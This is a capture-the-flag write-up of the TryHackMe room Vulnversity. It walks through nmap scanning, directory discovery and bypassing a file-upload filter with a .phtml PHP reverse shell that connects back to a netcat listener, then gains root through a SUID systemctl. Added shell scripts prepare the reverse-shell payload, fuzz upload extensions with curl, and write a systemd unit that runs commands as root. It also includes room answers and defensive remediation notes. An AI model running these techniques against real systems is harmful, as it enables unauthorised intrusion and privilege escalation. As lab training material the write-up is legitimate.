TryHackMe — Vulnversity

  • A TryHackMe account.
  • Kali, Parrot, or any other Linux-based OS with the required tools installed. This will be our attacking machine. I will be using Kali Linux, but you can use any other OS too.
  • Hands-on experience with Linux.
  • A curious, learning attitude.
  • Download your OpenVPN configuration file from TryHackMe; it is generally named your_username.ovpn.
  • Open a terminal, change to the directory where the .ovpn file was downloaded, and connect with sudo openvpn your_username.ovpn.
Connecting to VPN
  • When you are successfully connected to the VPN, the openvpn output ends with the line Initialization Sequence Completed.
Initialization Sequence Completed
  • Now deploy the machine by clicking the Deploy Machine button. Once clicked, the machine will be up within about two minutes.
  • Ping the machine to confirm it is reachable over the VPN before scanning.
Pinging the Machine
  • Scan the box with nmap: all 65535 TCP ports (-p-), default scripts (-sC), version detection (-sV), and a high minimum packet rate so the full-range scan finishes quickly.
sudo nmap -sC -sV -p- --min-rate=5000 10.10.138.148
Full Nmap Scan
  • Port 21 is running vsftpd 3.0.3. The vulnerability lookup only returned low-scored XSS and CSRF entries, which are not a path to remote code execution on an FTP daemon.
  • Port 22 is running OpenSSH 7.2p2, for which exploitdb has a username-enumeration exploit. It confirms valid usernames but gives no access on its own, so we note it and come back to it if required.
  • Ports 139 and 445 are running Samba (smbd 3.X - 4.X and smbd 4.3.11-Ubuntu respectively). The matching Samba is_known_pipename() arbitrary module load vulnerability needs write access to a share and knowledge of that share's path on the server. We have neither credentials nor a known writable share yet, so this approach is parked.
  • Port 3128 is running the Squid proxy, version 3.5.12. Searching turned up several issues (a buffer overflow and insufficient verification of data authenticity in squid-cache). They sound promising, but none of them gives us a foothold on this box, so we cannot start here either.
  • Port 3333 is running Apache httpd 2.4.18. The http-server-header is Apache/2.4.18 (Ubuntu) and the http-title is Vuln University, so this is the web application to look at first.
  • nmap's SMB scripts also returned some host details. We will come back to these if required.
  • Scan the box, how many ports are open?
6
  • What version of the squid proxy is running on the machine?
3.5.12
  • How many ports will nmap scan if the flag -p-400 is used?
400 (the range 1-400)
  • Using the nmap flag -n, what will it not resolve?
DNS
  • What is the most likely operating system this machine is running?
Ubuntu
  • What port is the webserver running on?
3333
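The scan questions above are answered from the screenshot, but the same answers fall out of nmap's greppable output (-oG) with a few lines of shell. This is an added example, not the author's code: the scan output below is constructed to mirror the six services found on the box (the exact banner strings are assumptions), and the helpers extract the open-port count, a service's version string and a rough OS guess from the banners.

```shell
#!/bin/sh
# Added example (not the author's code): answer the scan questions from nmap's
# greppable output (-oG) instead of reading the screenshot.
# Real run:  sudo nmap -sC -sV -p- --min-rate=5000 -oG scan.gnmap 10.10.138.148
# Caveat: a 5000 pps minimum rate over a VPN link can drop probes; if a port you
# expect is missing, rescan that port without --min-rate.

# Constructed -oG output modelled on the scan above (NOT the box's real output;
# banner details are assumed).
GNMAP=$(mktemp)
cat > "$GNMAP" <<'EOF'
# Nmap 7.92 scan initiated as: nmap -sC -sV -p- --min-rate=5000 -oG - 10.10.138.148
Host: 10.10.138.148 ()	Status: Up
Host: 10.10.138.148 ()	Ports: 21/open/tcp//ftp//vsftpd 3.0.3/, 22/open/tcp//ssh//OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)/, 139/open/tcp//netbios-ssn//Samba smbd 3.X - 4.X (workgroup: WORKGROUP)/, 445/open/tcp//netbios-ssn//Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)/, 3128/open/tcp//http-proxy//Squid http proxy 3.5.12/, 3333/open/tcp//http//Apache httpd 2.4.18 ((Ubuntu))/	Ignored State: closed (65529)
# Nmap done -- 1 IP address (1 host up) scanned
EOF

# One "port/state/proto/owner/service/rpc/version/" entry per line.
port_entries() {
  grep 'Ports:' "$1" \
    | sed -e 's/.*Ports: //' -e 's/[[:space:]]*Ignored State.*//' \
    | tr ',' '\n' \
    | sed 's/^ *//'
}

# Open port numbers, one per line.
open_ports() {
  port_entries "$1" | awk -F/ '$2 == "open" { print $1 }'
}

# Number of open ports (the first room question).
count_open_ports() {
  open_ports "$1" | wc -l | tr -d ' '
}

# Version string nmap recorded for a port, e.g. service_version scan.gnmap 3128
service_version() {
  port_entries "$1" | awk -F/ -v p="$2" '$1 == p { print $7 }'
}

# How many service banners mention Ubuntu: a cheap OS guess when -O was not run.
ubuntu_banner_count() {
  port_entries "$1" | awk -F/ '$7 ~ /Ubuntu/' | wc -l | tr -d ' '
}

echo "open ports:  $(open_ports "$GNMAP" | tr '\n' ' ')"
echo "count:       $(count_open_ports "$GNMAP")"
echo "squid:       $(service_version "$GNMAP" 3128)"
echo "ubuntu hits: $(ubuntu_banner_count "$GNMAP")"
```

Keeping the -oG (or -oA) file also means a second person can verify the answers without re-running a noisy full-range scan against the box.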
Note: I had to restart my Vulnversity machine and got a different IP.
Earlier IP: 10.10.138.148
Current IP: 10.10.89.96
dirsearch output
  • What is the directory that has an upload form page?
/internal/
http://10.10.89.96:3333/css
http://10.10.89.96:3333/fonts
http://10.10.89.96:3333/js
http://10.10.89.96:3333/internal
Note: I checked the files under the other URLs too but did not find anything interesting. Do look through them yourself; you may spot something I missed.
tun0 IP
Editing php-reverse-shell.php
Extension not allowed
Intercepted upload request sent to Intruder
Selecting the extension as the payload position (the dot is not selected)
Entering different extensions as payloads
phtml worked!!
Successfully uploaded php-reverse-shell.phtml
Found upload directory!!
php-reverse-shell.phtml file found!!
nc listener on port 55555
Shell
user.txt flag
  • Try uploading a few file types to the server. What common extension seems to be blocked?
.php
  • Run this attack, what extension is allowed?
.phtml
  • What is the name of the user who manages the webserver?
bill
  • What is the user flag?
8bd79[REDACTED]
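The Intruder run above can be reproduced from the command line, which is handy when Burp is not available. The script below is an added example, not the author's code or the room's: it rewrites the two listener lines of pentestmonkey's php-reverse-shell.php, tries the same payload under each candidate extension with curl, and classifies each reply. Everything about the form is assumed (a multipart field named file posted to /internal/index.php, a success message containing Success, the attacker address 10.8.0.1); only the "Extension not allowed" message and the port 55555 listener come from the walkthrough.

```shell
#!/bin/sh
# Added example (not the author's code): reproduce the Intruder extension fuzz
# with curl, after preparing the reverse-shell payload.
# Assumptions (not stated on the page): the upload form POSTs a multipart field
# named "file" to http://TARGET:3333/internal/index.php, a successful upload
# returns a body containing "Success", and our tun0 address is 10.8.0.1.

TARGET_URL="${TARGET_URL:-http://10.10.89.96:3333/internal/index.php}"
LHOST="${LHOST:-10.8.0.1}"     # tun0 address of the attacking machine (assumed)
LPORT="${LPORT:-55555}"        # the nc listener port used in the walkthrough

# Extensions that the Debian/Ubuntu php7 Apache config hands to the PHP handler.
# The room's filter only denies .php, so the rest are worth trying.
EXTENSIONS="php php3 php4 php5 phtml"

# Print one candidate filename per extension: candidate_names shell -> shell.php ...
candidate_names() {
  for ext in $EXTENSIONS; do
    printf '%s.%s\n' "$1" "$ext"
  done
}

# Classify the server's reply to one upload attempt.
# "Extension not allowed" is the exact message seen in the screenshots;
# the success string is an assumption.
classify_upload_response() {
  case "$1" in
    *"Extension not allowed"*) echo blocked ;;
    *Success*)                 echo uploaded ;;
    *)                         echo unknown ;;
  esac
}

# Point pentestmonkey's php-reverse-shell.php at our listener by rewriting its
# two "CHANGE THIS" lines ($ip = '127.0.0.1'; and $port = 1234;).
# $1 = source file, $2 = destination file.
prepare_payload() {
  sed -e "s/\\\$ip = '127\.0\.0\.1';/\$ip = '$LHOST';/" \
      -e "s/\\\$port = 1234;/\$port = $LPORT;/" "$1" > "$2"
}

# Upload the same payload once per candidate name and report how each is treated.
# Not run automatically: it needs the lab VPN. Start nc -lvnp "$LPORT" first.
fuzz_upload() {
  payload="$1"
  for name in $(candidate_names shell); do
    body=$(curl -s -F "file=@$payload;filename=$name" "$TARGET_URL")
    printf '%-12s %s\n' "$name" "$(classify_upload_response "$body")"
  done
}

# Constructed two-line stand-in for php-reverse-shell.php so prepare_payload can
# be exercised offline; the real file has the same two lines among many others.
STUB=$(mktemp); OUT=$(mktemp)
printf '%s\n' "\$ip = '127.0.0.1';  // CHANGE THIS" "\$port = 1234;       // CHANGE THIS" > "$STUB"
prepare_payload "$STUB" "$OUT"
cat "$OUT"
# Against the box: fuzz_upload "$OUT", then request the .phtml from the upload
# directory found with dirsearch to trigger the connection back.
```

Why .phtml gets through: the packaged Apache PHP configuration on Debian and Ubuntu maps .php, .php3, .php4, .php5, .pht and .phtml to the PHP handler, so a deny-list that only knows about .php leaves executable extensions open. The durable fix on the server side is an allow-list of expected extensions, a content-type check that does not trust the client, and an upload directory where script execution is disabled.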
Enumeration
List every regular file with the SUID bit set, discarding permission-denied errors:
find / -perm -u=s -type f 2>/dev/null
SUID files
Permissions of /bin/systemctl (SUID bit set)
Writing a service that reads the /root/root.txt flag
  • On the system, search for all SUID files. What file stands out?
/bin/systemctl
  • Become root and get the last flag (/root/root.txt)
a58ff[REDACTED]
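Two parts of the privilege escalation deserve to be spelled out: spotting which SUID binary matters in a long find listing, and what the "service" in the screenshot has to contain. The script below is an added example, not the author's code: the SUID sample list is constructed, the watchlist is a hand-picked subset of the binaries GTFOBins documents as abusable when SUID, and the link/enable sequence is the standard GTFOBins recipe for a SUID systemctl, offered as an assumption about how the author reached root rather than a transcript of it.

```shell
#!/bin/sh
# Added example (not the author's code): flag SUID binaries that stand out, and
# build the systemd unit used to read /root/root.txt through the SUID systemctl.

# Hand-picked subset of binaries GTFOBins lists as abusable when SUID. Anything
# here with the SUID bit set deserves a second look; passwd, sudo, su, mount are
# expected SUID binaries and are not listed.
SUID_WATCHLIST="systemctl find vim vi nano python python3 perl bash sh env cp mv less more tar"

# Read SUID paths on stdin (output of find / -perm -u=s -type f) and print the
# ones whose basename is on the watchlist.
unusual_suid() {
  while IFS= read -r path; do
    base=${path##*/}
    for w in $SUID_WATCHLIST; do
      [ "$base" = "$w" ] && { printf '%s\n' "$path"; break; }
    done
  done
  return 0
}

# Write a oneshot unit. systemd runs ExecStart as root unless User= says
# otherwise, so whatever we put there runs with root's privileges.
# $1 = unit file path, $2 = file to read, $3 = where to copy it for our user.
write_reader_unit() {
  cat > "$1" <<EOF
[Unit]
Description=read $2

[Service]
Type=oneshot
ExecStart=/bin/sh -c 'cat $2 > $3; chmod 644 $3'

[Install]
WantedBy=multi-user.target
EOF
}

# Register and start the unit through the SUID systemctl (GTFOBins sequence;
# an assumption about what the author did). Not run here: needs the box.
# systemctl link wants an absolute path; enable --now starts it immediately.
run_unit_as_root() {
  /bin/systemctl link "$1"
  /bin/systemctl enable --now "$(basename "$1")"
  # Clean up afterwards: /bin/systemctl disable "$(basename "$1")"; rm -f "$1"
}

# Constructed find output (not the box's real list) to exercise unusual_suid.
SAMPLE_SUID="/usr/bin/passwd
/usr/bin/sudo
/bin/su
/bin/mount
/bin/systemctl
/usr/bin/newgrp"

UNIT="/tmp/reader-$$.service"
write_reader_unit "$UNIT" /root/root.txt /tmp/output

echo "stands out:"; printf '%s\n' "$SAMPLE_SUID" | unusual_suid
echo "unit file:";  cat "$UNIT"
# On the box: run_unit_as_root "$UNIT" && cat /tmp/output
```

The root cause is not a systemctl bug but a permission mistake: a SUID-root systemctl lets any local user ask systemd to run arbitrary commands as root. The check to run on your own hosts is the same find command, diffed against a known-good baseline, with anything from the watchlist treated as an incident.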
Aakash Kumar
Security Researcher | Bibliophile | Thinker